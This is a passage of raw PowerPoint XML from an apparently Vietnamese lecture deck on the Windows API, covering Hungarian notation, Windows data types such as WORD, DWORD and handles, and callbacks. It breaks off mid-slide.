            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Networking API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22840153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API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Cho </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>viện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ký</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Hungarian notation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lAccountNum</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>arru8NumberList</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>szName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bReadLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, &amp;arru8NumberList)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>strName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>pX</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28545383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Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>WORD (w): 16 bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dấu</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DWORD (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>): 32 bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dấu</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Handles (H): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chiếu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>HModule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Hinstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>HKey</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Long Pointer (LP):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>LPByte</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hàm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Windows API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>InternetSetStatusCallback</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604202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API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Handles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>xử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lý</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> HĐH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cửa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sổ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, module, menu, file, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Handles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vùng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhớ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lưu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>gọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> handles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trỏ</a:t>
            </a:r>
            <a:r>
